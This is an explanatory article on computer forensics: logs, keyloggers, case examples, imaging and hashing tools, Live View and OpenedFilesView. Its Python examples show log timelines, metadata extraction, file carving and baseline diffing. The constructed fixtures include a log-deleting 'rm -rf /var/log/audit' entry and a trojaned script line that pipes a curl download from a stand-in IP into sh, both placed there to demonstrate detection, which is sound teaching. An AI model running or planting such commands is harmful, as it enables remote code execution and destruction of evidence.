Computer forensics services are availed most in cases of sabotage and mishandling of data or information. Fingerprints on equipment like the victim computer can be mapped to find the person who might have accessed the system. An important difference that should be noted here is that evidence proving that the person who accessed the system also committed the crime is difficult to establish in a court of law. The task of the computer forensic expert becomes severe if the tracks are erased. Software tools can be used to track the changes that are made during the crime, and the usage of incident response systems is quite useful. CSI tools are also available, and the expert should be proficient in the usage of these tools. Detailed reports can then be drawn based on the findings of the preliminary investigation.

Some of the qualities that are required from a crime scene investigation professional are mentioned below. The first thing that should be borne in mind before starting the investigation is to think with the mindset of how the criminal would have committed the crime, and to analyze the possibilities of the clues he might have left behind. Hence it is required to have a criminal mindset and an understanding of the things that can lead to the vulnerability of the organization that is the victim of the crime. It is expected that the person is well versed with photographic equipment and the processes that need to be carried out during the investigation. He should be capable of preparing diagrams and of collecting evidence with the greatest observation. The investigative results should be such that the crime scene can be recreated.

Access to the computer system and the networking areas also needs to be looked at thoroughly. Crime scene investigation is based on the principle of first-hand information and the observation power of the professional. Finding the relevant information after interviewing the personnel and witnesses is also a part of computer crime scene investigation. The capacity of the professional to check the evidence and produce it legally in the court of law matters a lot.

Log File Recovery

For a computer forensic professional, recovery of the log files is an important task. Most of computer forensics is dependent on the log files. Let us try to discuss the importance of the log files.

Log files are system files that provide information about the activities of the user. They are created by the user's operating system whenever a task is performed. From the starting of the operating system and the loading of the personal settings of the user, the kernel acts as a Big Brother that is responsible for monitoring the user's activities. Log files contain date and time stamps to show the record of the user's activities. Log files are not only created by the operating system but by some application software as well. For example, database application software requires a mandatory login with a password prompt.

Log files are important not only in the investigation but, more importantly, in proving the point in a court of law. Hence the log files play an important role in determining the fate of the computer criminal. If the computer criminal is intelligent enough not to leave any evidence, then it is also possible that he may delete or corrupt the log files. If the log files are lost, then the data recovery process to recover the log files should be initiated.

Key logger programs can be used to trace the habits of the criminal. The tendency of a key logger program to record each and every key stroke, including usernames and passwords or any other key, gives some specific information about the criminal and the time stamp of when the crime might have been committed. A thorough study of the key words that are entered makes way for the computer forensics experts to nail the criminal. The task involved in studying the key logger output is tedious, since a lot of junk information also needs to be scanned. Whatever the truth may be, the evidence matters a lot in the court of law.
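The paragraphs above say that log files carry the time stamps from which the user's activities are reconstructed, and that a criminal may delete or corrupt them. The following is an added example, not part of the original report, of the mechanical side of that work: parsing raw lines into a time-ordered timeline, tolerating a corrupted line, and pulling one common pattern (a password guessed after repeated failures, followed by an attempt to delete audit logs) out of it. The SAMPLE_LOG lines are constructed in syslog style; the regular expressions, the year supplied by the examiner, the three-failure threshold and the five-minute window are assumptions for this illustration.

```python
"""Building a timeline from log lines and pulling a pattern out of it.

Added example, not from the original report. SAMPLE_LOG is constructed in
syslog style; the regular expressions, the year, the threshold and the
window are assumptions made for this illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
Mar  4 02:14:07 fileserver sshd[2231]: Failed password for admin from 203.0.113.9 port 50122 ssh2
Mar  4 02:14:09 fileserver sshd[2231]: Failed password for admin from 203.0.113.9 port 50122 ssh2
Mar  4 02:14:12 fileserver sshd[2235]: Failed password for admin from 203.0.113.9 port 50130 ssh2
Mar  4 02:14:15 fileserver sshd[2235]: Failed password for admin from 203.0.113.9 port 50130 ssh2
Mar  4 02:14:18 fileserver sshd[2240]: Accepted password for admin from 203.0.113.9 port 50141 ssh2
Mar  4 02:13:55 fileserver sshd[2229]: Accepted publickey for backup from 192.0.2.20 port 41002 ssh2
Mar  4 02:16:40 fileserver sudo:    admin : TTY=pts/1 ; PWD=/home/admin ; COMMAND=/bin/rm -rf /var/log/audit
this line is corrupted and will be skipped by the parser
Mar  4 02:17:02 fileserver sshd[2240]: Received disconnect from 203.0.113.9 port 50141
"""

# syslog line: "<Mon dd HH:MM:SS> <host> <process>[pid]: <message>"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<proc>[^:\[\s]+)(?:\[\d+\])?: (?P<msg>.*)$")
AUTH_RE = re.compile(r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+)")


def parse_log(text, year):
    """Parse what can be parsed, keep going past bad lines, and sort by time.
    Classic syslog carries no year, so the examiner supplies it from context."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # a forensic parser must not die on one corrupted line
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"time": when, "host": m["host"], "proc": m["proc"], "msg": m["msg"]})
    events.sort(key=lambda e: e["time"])  # log files are append-ordered, not always time-ordered
    return events


def find_brute_force(events, threshold=3, window=timedelta(minutes=5)):
    """Flag an accepted login that follows >= threshold failures for the same
    (source, user) pair inside the window: the signature of a guessed password."""
    failures = defaultdict(list)
    hits = []
    for e in events:
        m = AUTH_RE.search(e["msg"])
        if not m:
            continue
        key = (m["src"], m["user"])
        if m["result"] == "Failed":
            failures[key].append(e["time"])
            continue
        recent = [t for t in failures[key] if e["time"] - t <= window]
        if len(recent) >= threshold:
            hits.append({"src": m["src"], "user": m["user"], "failures": len(recent),
                         "first_failure": recent[0], "login": e["time"]})
        failures[key].clear()
    return hits


def sudo_commands(events, user, since):
    """What did the account do after the suspicious login? Pull its sudo commands."""
    found = []
    for e in events:
        if e["time"] >= since and e["proc"] == "sudo" and f" {user} :" in e["msg"]:
            m = re.search(r"COMMAND=(.*)$", e["msg"])
            if m:
                found.append((e["time"], m.group(1)))
    return found


if __name__ == "__main__":
    timeline = parse_log(SAMPLE_LOG, year=2024)
    for hit in find_brute_force(timeline):
        print(f"{hit['src']} guessed {hit['user']}'s password after "
              f"{hit['failures']} failures at {hit['login']}")
        for when, cmd in sudo_commands(timeline, hit["user"], hit["login"]):
            print(f"  {when}  sudo {cmd}")
```

The sort step matters: the successful publickey login at 02:13:55 was written after later entries, and a reader working in file order would place it wrongly. The final sudo line is also the kind of entry the text warns about, the criminal deleting the audit log, which is why logs forwarded to a separate host are worth far more than logs that live only on the compromised machine.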

Database applications are designed to record the activities of the user in a simple text file. This helps in tracking the changes that are made to the database. Most log files are usually stored in text format, but in some cases the log files may be in an encrypted format. The computer forensics professional should be well versed with all the techniques and the different types of log files, and it is required of him to decrypt the encrypted log files. Log files play an important role in tracking the culprit of a computer crime. If they are lost and cannot be recovered, then the task of the computer forensics expert is very much more difficult. Hence utmost care must be taken to preserve the log files without tampering with the data in them.

If the computer administrator is clever enough to employ a key logger program, then the task of the computer forensics professional becomes much simpler. The key logger program's trick is to store each of the key strokes of the keyboard into a text file. The computer forensics professional uses this key logger text file and scans the contents to read the information and the actions carried out by the user. But a disadvantage regarding the key logger program is that the forensics professional is left with the task of studying mostly irrelevant information, since all the key strokes are recorded. There are even hardware key loggers that can be used to record the information. An example of a hardware key logger is the 'KeyGhost' key logger. It is a small device connected between the keyboard and the computer that can store some 5 megabytes of data in text format.

Examples: Computer forensics has played a pivotal role in many cases.

BTK Killer: Dennis Rader was convicted of a string of serial killings that occurred over a period of sixteen years. Towards the end of this period, Rader sent letters to the police on a floppy disk. Metadata within the documents implicated an author named "Dennis" at "Christ Lutheran Church"; this evidence helped lead to Rader's arrest.
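The BTK case above turned on document metadata, the author and organisation fields that an office application writes into every file it saves. The following is an added example, not from the original report and not connected to that case: it reads those fields from a modern Word file (.docx), which is a zip archive whose docProps/core.xml and docProps/app.xml parts carry the creator, last editor, revision count, timestamps and company. build_sample_docx() fabricates such a file in memory so the extractor can run offline; every name and date in the sample is made up. The legacy .doc format of the floppy-disk era keeps the same fields in the OLE2 SummaryInformation stream instead, so this code applies the principle rather than reproducing that format.

```python
"""Reading author metadata out of an Office document.

Added example, not from the original report. A .docx is a zip archive;
docProps/core.xml and docProps/app.xml hold the identifying properties.
build_sample_docx() constructs a minimal stand-in with made-up values.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

CORE_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# (key in our result, element in core.xml)
CORE_FIELDS = [("creator", "dc:creator"), ("last_modified_by", "cp:lastModifiedBy"),
               ("revision", "cp:revision"), ("created", "dcterms:created"),
               ("modified", "dcterms:modified")]


def extract_docx_metadata(docx_bytes):
    """Return a dict of the identifying properties present in the document.
    Missing parts or empty elements are simply absent from the result."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            for key, tag in CORE_FIELDS:
                el = root.find(tag, CORE_NS)
                if el is not None and el.text and el.text.strip():
                    found[key] = el.text.strip()
        if "docProps/app.xml" in names:
            root = ET.fromstring(z.read("docProps/app.xml"))
            for tag in ("Application", "Company"):
                el = root.find(f"{{{APP_NS}}}{tag}")
                if el is not None and el.text and el.text.strip():
                    found[tag.lower()] = el.text.strip()
    return found


def build_sample_docx(creator, last_modified_by, company, with_metadata=True):
    """Constructed stand-in for a real .docx: only the parts the extractor reads."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<cp:coreProperties xmlns:cp="{CORE_NS["cp"]}" xmlns:dc="{CORE_NS["dc"]}" '
        f'xmlns:dcterms="{CORE_NS["dcterms"]}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        f'<dc:creator>{creator}</dc:creator>'
        f'<cp:lastModifiedBy>{last_modified_by}</cp:lastModifiedBy>'
        '<cp:revision>3</cp:revision>'
        '<dcterms:created xsi:type="dcterms:W3CDTF">2009-02-10T09:12:00Z</dcterms:created>'
        '<dcterms:modified xsi:type="dcterms:W3CDTF">2009-02-16T14:03:00Z</dcterms:modified>'
        '</cp:coreProperties>'
    )
    app = (f'<Properties xmlns="{APP_NS}"><Application>Microsoft Office Word</Application>'
           f'<Company>{company}</Company></Properties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")      # a real file lists every part here
        z.writestr("word/document.xml", "<w:document/>")   # the body is irrelevant to this example
        if with_metadata:
            z.writestr("docProps/core.xml", core)
            z.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("jdoe", "Office Admin", "Example Parish")
    for key, value in extract_docx_metadata(sample).items():
        print(f"{key:18} {value}")
```

Two cautions the case illustrates: the creator field records whichever name the application was configured with, not a verified identity, so it points investigators somewhere rather than proving authorship; and the same fields can be stripped or edited with ordinary office software, so their absence means little.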

Joseph E. Duncan III: A spreadsheet recovered from Duncan's computer contained evidence which showed him planning his crimes. Prosecutors used this to show premeditation and secure the death penalty.

Sharon Lopatka: Hundreds of emails on Lopatka's computer led investigators to her killer, Robert Glass.

COMPUTER FORENSICS TOOLS

Tools: No matter how limited a department's budget is, no credible investigator would stoop to wrenching open a computer to find clues. Programmers have created many computer forensics applications. For many police departments, the choice of tools depends on department budgets and available expertise. Here are a few computer forensics programs and devices that make computer investigations possible.

Disk imaging software records the structure and contents of a hard drive. With such software, it's possible not only to copy the information on a drive but also to preserve the way files are organized and their relationship to one another.

Software or hardware write tools (write blockers and imagers) copy and reconstruct hard drives bit by bit. Both the software and hardware tools avoid changing any information. Some tools require investigators to remove hard drives from the suspect's computer first before making a copy.

Hashing tools compare original hard disks to copies. The tools analyze the data and assign it a unique number, a cryptographic hash. If the hash numbers on an original and a copy match, the copy is a perfect replica of the original. In current practice that number is a SHA-256 (or similar) digest; MD5 is still seen in older reports, but collisions can be manufactured for it, so it should not be relied on alone.

Investigators use file recovery programs to search for and restore deleted data. These programs locate data that the computer has marked for deletion but has not yet overwritten. Sometimes this results in an incomplete file, which can be more difficult to analyze.

There are several programs designed to preserve the information in a computer's random access memory (RAM). Unlike information on a hard drive, the data in RAM ceases to exist once someone shuts off the computer. Without the right software, this information could be lost easily.

Analysis software sifts through all the information on a hard drive, looking for specific content. Because modern computers can hold gigabytes of information, it's very difficult and time consuming to search computer files manually. For example, some analysis programs search and evaluate Internet cookies, which can help tell investigators about the suspect's Internet activities. Other programs let investigators search for specific content that may be on the suspect's computer system.

Encryption decoding software and password cracking software are useful for accessing protected data.

Phoning It In: Cell phones can contain important information on them. A cell phone is essentially a small computer. A few computer forensics vendors offer devices that can copy all the contents of a cell phone's memory and print up a comprehensive report. These devices retrieve everything from text messages to ring tones.

These tools are only useful as long as investigators follow the right procedures. Otherwise, a good defense lawyer could suggest that any evidence gathered in the computer investigation isn't reliable. Of course, a few anti-forensics experts argue that no computer evidence is completely reliable.
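Two of the tool categories above, hashing tools that prove a copy matches the original and file recovery programs that find data the file system has marked deleted but not overwritten, are simple enough to show in code. The following is an added example, not from the original article or from any named product. build_sample_image() writes a constructed "disk image" to a temporary directory: filler bytes standing in for unallocated space plus a JPEG and a PNG whose directory entries are gone but whose bytes remain. The hash verification detects a single flipped byte in a copy; the carver recovers both files by their header and trailer signatures. The SIGNATURES table and the two sample payloads are constructed for the illustration and are deliberately minimal.

```python
"""Verifying a disk image and carving deleted files out of it.

Added example, not from the original report. The "disk image", the
signature table and the two payloads are constructed for illustration.
"""
import hashlib
import os
import tempfile

CHUNK = 1 << 20  # hash in 1 MiB pieces so multi-GB images need not fit in memory

# File type -> (header magic, trailer magic) used by signature-based carving.
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
}

# Constructed payloads that begin and end like real files.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"\x01\x02\x03\x04" * 64 + b"\xff\xd9"
PNG_SAMPLE = (b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
              + b"\x00\x00\x00\x00IEND\xaeB`\x82")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for piece in iter(lambda: f.read(CHUNK), b""):
            h.update(piece)
    return h.hexdigest()


def verify_copy(original, copy):
    """A forensic copy is only usable if its hash equals the original's."""
    return sha256_file(original) == sha256_file(copy)


def carve(path):
    """Scan the whole image, allocated or not, for header/trailer pairs.
    Returns [(type, offset, bytes)] ordered by offset. Caveat: the first trailer
    after a header is taken, so a JPEG with an embedded thumbnail (which carries
    its own FFD9) would come out truncated; real carvers parse the segments."""
    with open(path, "rb") as f:
        data = f.read()  # fine for a sample; mmap a real image instead
    found = []
    for kind, (header, trailer) in SIGNATURES.items():
        pos = 0
        while True:
            start = data.find(header, pos)
            if start < 0:
                break
            end = data.find(trailer, start + len(header))
            if end < 0:
                break
            end += len(trailer)
            found.append((kind, start, data[start:end]))
            pos = end
    return sorted(found, key=lambda item: item[1])


def filler(n):
    """Deterministic 'unallocated space' that can never contain a signature:
    values step by one, so 0xFF never occurs and no magic sequence can form."""
    return bytes(i % 251 for i in range(n))


def build_sample_image(directory=None):
    """Write the constructed image; return (path, {type: true offset of the file})."""
    directory = directory or tempfile.mkdtemp(prefix="carve-demo-")
    path = os.path.join(directory, "suspect.dd")
    parts = [filler(4096), b"ALLOCATED: report.txt\n", filler(2048)]
    offsets = {"jpg": sum(len(p) for p in parts)}
    parts += [JPEG_SAMPLE, filler(1000)]
    offsets["png"] = sum(len(p) for p in parts)
    parts += [PNG_SAMPLE, filler(3000)]
    with open(path, "wb") as f:
        f.write(b"".join(parts))
    return path, offsets


def make_copy(src, flip_one_byte=False):
    """Image the 'drive'; optionally corrupt one byte to show the hash catching it."""
    dst = src + (".bad" if flip_one_byte else ".copy")
    with open(src, "rb") as f:
        data = bytearray(f.read())
    if flip_one_byte:
        data[len(data) // 2] ^= 0x01
    with open(dst, "wb") as f:
        f.write(data)
    return dst


if __name__ == "__main__":
    image, offsets = build_sample_image()
    copy = make_copy(image)
    print("copy verified:", verify_copy(image, copy), sha256_file(copy))
    print("bad copy verified:", verify_copy(image, make_copy(image, flip_one_byte=True)))
    for kind, offset, blob in carve(copy):
        print(f"carved {kind} at offset {offset} ({len(blob)} bytes), expected {offsets[kind]}")
```

In practice the acquisition hash is recorded with the image at the moment it is taken, behind a write blocker, and recomputed over every working copy before and after analysis; a mismatch at any point means the chain of custody cannot be shown.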

Whether courts continue to accept computer evidence as reliable remains to be seen. Anti-forensics experts argue that it's only a matter of time before someone proves in a court of law that manipulating computer data without being detected is both possible and plausible. If that's the case, courts may have a hard time justifying the inclusion of computer evidence in a trial or investigation.

Techniques: One of the first things that you'd need to do is take the compromised system out of the picture. If there is intellectual property on the system, it's worthwhile to enable a firewall to block the traffic or, better yet, just yank out the network cable to avoid the possibility of intellectual property being stolen from the system. Keep in mind that rebooting or powering off the machine destroys the contents of RAM and changes file timestamps, so if volatile evidence matters, capture memory before any restart.

Once this has been completed, you can look into determining what has been changed. Live View, an open source utility, creates a virtual machine out of the existing system. Live View creates a virtual disk out of the system that allows you to safely investigate a copy of the system without interfering with anything installed. And if it doesn't detect VMware Workstation 5.5 or VMware Server 1.x, it will download it for you. Of course, you could use VMware Converter to create a vmdk (virtual machine disk) to use in more recent versions of Server or Workstation.

On another basis, Wireshark can let you review all network traffic to see if anything unexpected is being sent out to another location. While that's running, you can use HijackThis as an additional tool and rule out obvious malware or other items that tie themselves into the registry. Once you've rebooted the system you can then go to Merijn and download StartupList. This is a great way to start the investigation of a system and determine what things might have potentially been put on the system to restart each time the system does.

The next trick is to determine what additional files, other than the usual, are open. In Linux we use lsof, which lists open files, but for Windows, by default, there is no similar command. Instead, there is OpenedFilesView, a Windows executable that lists all the files and processes, both local and network based, on the system. This allows us to determine if anything suspicious exists in the system while it's running live.
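The step "determining what has been changed" is only possible if there is something to compare against. The following is an added example, not from the original article and not part of Live View, HijackThis or OpenedFilesView: it takes a baseline manifest of a directory tree (path, SHA-256, size, modification time), takes another after the incident, and classifies every path as added, removed or modified by content hash. It also flags the case the text's "intelligent criminal" would produce: a replaced binary whose timestamp was put back so that a modification-time check would miss it. build_sample_tree() and simulate_intrusion() construct the before and after states in a temporary directory; the file names, the planted path and the command in the trojaned script are made up for the illustration.

```python
"""Finding what an intruder changed: baseline the file system, diff it later.

Added example, not from the original report. The sample tree and the
post-compromise changes are constructed for this illustration.
"""
import hashlib
import os
import stat
import tempfile


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for piece in iter(lambda: f.read(1 << 20), b""):
            h.update(piece)
    return h.hexdigest()


def snapshot(root):
    """relative path -> (sha256, size, mtime_ns) for every regular file under root.
    lstat is used so that a planted symlink is recorded as itself, not followed."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, devices, sockets
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = (sha256_of(full), st.st_size, st.st_mtime_ns)
    return manifest


def compare(baseline, current):
    """Classify every path. Content is judged by hash, never by timestamp."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p][0] != current[p][0])
    # Content changed but mtime identical: the timestamp was reset ("timestomping").
    timestomped = [p for p in modified if baseline[p][2] == current[p][2]]
    return {"added": added, "removed": removed, "modified": modified, "timestomped": timestomped}


def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)
    return full


def build_sample_tree(directory=None):
    """Constructed 'clean' system: a script, a cron job, a log and a user file."""
    root = directory or tempfile.mkdtemp(prefix="baseline-demo-")
    _write(root, "bin/ls", b"#!/bin/sh\nexec /usr/bin/ls \"$@\"\n")
    _write(root, "etc/cron.d/backup", b"0 2 * * * root /usr/local/bin/backup\n")
    _write(root, "var/log/auth.log", b"Mar  4 02:14:18 sshd: Accepted password for admin\n")
    _write(root, "home/admin/notes.txt", b"quarterly figures\n")
    return root


def simulate_intrusion(root):
    """Constructed post-compromise changes applied to the sample tree."""
    ls = os.path.join(root, "bin", "ls")
    original_mtime_ns = os.lstat(ls).st_mtime_ns
    _write(root, "bin/ls", b"#!/bin/sh\ncurl -s http://198.51.100.7/c | sh\nexec /usr/bin/ls \"$@\"\n")
    os.utime(ls, ns=(original_mtime_ns, original_mtime_ns))  # put the old timestamp back
    os.remove(os.path.join(root, "var", "log", "auth.log"))   # cover tracks
    _write(root, "tmp/.x/kit.tar.gz", b"\x1f\x8b\x08\x00toolkit")  # planted payload
    # A timestamp change with identical content (e.g. a backup job) is not a modification.
    notes = os.path.join(root, "home", "admin", "notes.txt")
    os.utime(notes, ns=(original_mtime_ns + 10**9, original_mtime_ns + 10**9))


if __name__ == "__main__":
    root = build_sample_tree()
    before = snapshot(root)
    simulate_intrusion(root)
    for category, paths in compare(before, snapshot(root)).items():
        print(f"{category:12} {paths}")
```

The baseline must be stored off the machine (and its own hash recorded), because a manifest kept on the compromised host is just one more file the intruder can edit; and it must be taken from a known-good state, which in practice means at build time rather than after the incident report arrives.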

Helix 3, a newly updated version of the live Linux forensics tool, can be used to examine the disk safely to see what has finally been changed. Forensics of a system is critical to know what has been compromised. It is one thing to know if we've been attacked, but it's another to find out what those attackers have done to the system. If we don't look into what happened, we may miss critical data being compromised or fail to learn how the system was first broken into. Once this investigation is done, we can then rebuild the system with appropriate additional security in place to prevent the attack from happening again. And we can do this all at minimal cost, an important factor to consider in this day and age of economic belt-tightening.

Live View: Live View is a Java-based graphical forensics tool that creates a VMware virtual machine out of a raw (dd-style) disk image or physical disk. This allows the forensic examiner to "boot up" the image or disk and gain an interactive, user-level perspective of the environment, all without modifying the underlying image or disk. Because all changes made to the disk are written to a separate file, the examiner can instantly revert all of his or her changes back to the original pristine state of the disk. The end result is that one need not create extra "throw away" copies of the disk or image to create the virtual machine.

Live View is capable of booting full disk raw images, bootable partition raw images, physical disks (attached via a USB or Firewire bridge) and specialized and closed image formats (using 3rd party image mounting software), containing the following operating systems: Windows 2008, Vista, 2003, XP, 2000, NT, Me and 98, and Linux (limited support).

Behind the scenes, Live View automates a wide array of technical tasks. Some of these include: resolving hardware conflicts resulting from booting on hardware other than that on which the OS was originally installed, creating a customized MBR for partition-only images, and correctly specifying a virtual disk to match the original image or physical disk. Live View is developed by CERT, Software Engineering Institute.

OpenedFilesView: OpenedFilesView displays the list of all opened files on your system. For each opened file, additional information is displayed: handle value, read/write/delete access, file position, the process that opened the file, and more. Optionally, you can also close one or more opened files, or close the process that opened these files.

This utility is especially useful if you try to delete/move/open a file and you get one of the following error messages: "Cannot delete [filename]: There has been a sharing violation. The source or destination file may be in use." or "Cannot delete [filename]: It is being used by another person or program. Close any programs that might be using the file and try again." When you get one of these error messages, OpenedFilesView will show you which process locks your file. Closing the right process will solve this problem. Optionally, you can also release the file by closing the handle from the OpenedFilesView utility. However, be aware that after closing a file in this way, the program that opened the file may become unstable, and even crash. On a system under investigation, closing handles or killing processes also changes the evidence, so the forensic use of the tool is to observe and record, not to intervene.

www.nirsoft.net

System Requirements: This utility works properly on Windows 2000, Windows XP, Windows 2003/2008, Windows Vista, and Windows 7 (32-bit only!). Older versions of Windows (NT/9x/ME) are not supported. There is also a separate version for x64 systems. Also, you must have administrative privilege in order to run this utility.

How does it work? OpenedFilesView uses the NtQuerySystemInformation API to enumerate all handles in the system. After filtering non-file handles, it uses a temporary device driver, NirSoftOpenedFilesDriver.sys, for reading the information about each handle from kernel memory. This device driver is automatically unloaded from the system when you exit from the OpenedFilesView utility. OpenedFilesView cannot close files opened by the Windows kernel.

OpenedFilesView on x64 systems: There is a separate download for the x64 (64-bit) version of OpenedFilesView. However, on Windows 7/Vista/2008, this utility can only work if you turn on the driver signing test mode. For more information, see the remark below. Note that loading the driver, and in particular switching the boot configuration to test-signing mode, modifies the examined system; both actions should be recorded in the examination notes.

Using OpenedFilesView: OpenedFilesView doesn't require any installation process or additional DLLs. In order to start using it, just run the executable file, OpenedFilesView.exe. The main window of OpenedFilesView displays the list of all files currently opened in your system. In order to refresh the list of opened files, press F5, or alternatively use the Auto Refresh feature (Options -> Auto Refresh -> Every x seconds) in order to automatically refresh the opened files list every 1 to 5 seconds.

Explorer Context Menu: Starting from version 1.10, you can launch OpenedFilesView directly from Windows Explorer, and view only the handles of the file or folder that you want to inspect. In order to enable this feature, check 'Enable Explorer Context Menu' under the Options menu. After you enable this feature, you can right-click on any file or folder in Windows Explorer and choose the 'OpenedFilesView' item from the menu. If you run the OpenedFilesView option for a file, it'll display all opened handles for that file. If you run the OpenedFilesView option for a folder, it'll display all opened files inside that folder.

Translating OpenedFilesView to Another Language

OpenedFilesView allows you to easily translate all menus, dialog-boxes, and other strings to other languages. In order to do that, follow the instructions below. Run OpenedFilesView with the /savelangfile parameter: OpenedFilesView.exe /savelangfile. A file named OpenedFilesView_lng.ini will be created in the folder of the OpenedFilesView utility. Open the created language file in Notepad or in any other text editor, and translate all menus, dialog-boxes, and string entries to the desired language. After you finish the translation, run OpenedFilesView, and all translated strings will be loaded from the language file. If you want to run OpenedFilesView without the translation, simply rename the language file, or move it to another folder.

OpenedFilesView is also available in other languages. In order to change the language of OpenedFilesView, download the appropriate language zip file, extract 'openedfilesview_lng.ini', and put it in the same folder in which you installed the OpenedFilesView utility.

Language              Translated By                   Date
Brazilian Portuguese                                  11/11/2010
Czech                 czRoPa                          17/12/2008
Dutch                 Sander Lambregts                18/04/2009
Dutch                 Jan Verheijen                   17/09/2009
French                Eric FICHOT                     01/07/2009
French                Labbaipierre                    22/07/2006
Galician              Xosé Antón Vicente Rodríguez    21/01/2008
German                «Latino» auf WinTotal.de        10/11/2010
Hungarian             Dura Sándor, Soft Gasparics     02/10/2008
Italian               Giacomo Margarito               02/04/2006
Japanese              Nardog                          15/07/2006
Korean                (name not recoverable)          12/04/2009
Persian               NAHCI 13                        01/09/2007
Polish                Hightower                       11/11/2010
Russian               solokot                         01/09/2009
Simplified Chinese    renda                           02/09/2009
Simplified Chinese    Lewen                           16/11/2009
Slovenian                                             01/09/2009
Spanish               Omi                             17/10/2009
Spanish               Paco Fdez                       06/05/2009
Taiwanese             Republic of Taiwan              22/01/2009
Traditional Chinese   King                            02/07/2009
Thai                  (name not recoverable)          26/03/2008
Ukrainian             Alexander Shpek                 09/10/2009
Valencian             vjatv                           01/10/2008

COMPUTER FORENSICS IMPACT

The impact of computer forensics is that criminals are identified and subsequently punished. Suppose in any organization a computer crime is committed and data has been lost, or there is theft of data or secret information. In such a situation computer forensics can be effectively used for the purpose of tracking the person behind the crime. The culprit in computer crimes can be detected and put to trial. The impact and the result of a successful forensic solution will lead the culprit or the criminal to the court that may provide the punishment. Punishment always results in a decrease in the crime rate.

Most organizations are taking precautionary measures by installing and deploying security devices. The most popular among the security systems is the usage of IDS (Intrusion Detection Systems). The other forms of security devices also include firewalls, proxies, anti-spyware etc. To some extent anti-virus software also acts as a security measure. Most of this software reports the security status of the networks. The basic procedures of using firewalls and anti-spyware are not sufficient for the purpose of providing adequate protection to the computer system or to the data and information related to the computers. Hence it is required for the company to avail the services of companies that specialize in providing security. There are many companies that deal specifically in providing security to their customers or clientele. The International Data Corporation (IDC) reported that the market for computer forensics and for intrusion detection software will reach a new high. There will also be an increase in the market capitalization for software like vulnerability assessment etc.

There are legal impacts as well in regard to computer forensics. If computer forensics is ignored, then that may result in risking vital clues and the loss of information. If computer forensics is not performed up to expectations, then it is also possible that the forensic evidence may be ruled inadmissible in a court of law. It is also possible that the organization may fall into legal wrangles. That is, the organization may run afoul of new laws that mandate regulatory compliance. The mandate may apply negatively if certain types of data are not appropriately protected. It is also possible to hold organizations liable in the criminal court if they fail to protect customer data. The governments of various countries have taken many initiatives in supporting and upgrading computer forensics.

There are many laws and legislations to support computer forensics. Moreover there are many departments run by the government especially for computer forensics. These departments work like the police authorities, registering the complaints of users and investigating the matter to produce before a court of law. Also there are many private computer forensic companies that deal in this regard. Computer forensics has become vital in the corporate world.

Need for Computer Forensics

The purpose of computer forensics is mainly due to the wide variety of computer crimes that take place. There are various computer crimes that occur on a small scale as well as on a large scale. The loss caused is dependent upon the sensitivity of the computer data or information for which the crime has been committed. The people that gain access to computer systems without proper authorization should be dealt with. For this purpose computer forensics is used, as it helps in tracking the criminal. The main purpose of computer forensics is to produce evidence in the court that can lead to the punishment of the actual culprit. Computer forensics is a threat to wrongdoers and people with negative mindsets.

Forensic science is actually the process of utilizing scientific knowledge for the purpose of the collection, analysis, and most importantly the presentation of evidence in a court of law. There are hardware and software that employ security measures in order to track changes and updates to data or information. The user information is provided in the log files, which can be effectively used to produce evidence in a legal manner in case of any crime. Computer forensics is also efficient where data is stored in a single system for backup. Data theft and intentional damage of data in a single system can also be minimized with computer forensics.

The need in the present age can be considered much more severe due to internet advancements and the dependency on the internet. Network security is an important issue related to the computer world. There can be theft of data from an organization, in which case the organization may sustain heavy losses. With the present technological advancements it is common for every organization to employ the services of computer forensics experts.

The word forensic itself means to bring to the court. The need or importance of computer forensics is to ensure the integrity of the computer system. The subject provides in-depth knowledge for understanding the legal as well as the technical aspects of computer crime. It is very useful from a technical standpoint. The security personnel deploy effective measures using computer forensics; Intrusion Detection Systems are used for that purpose. A system with some small measures can avoid the cost of operating and maintaining the security.

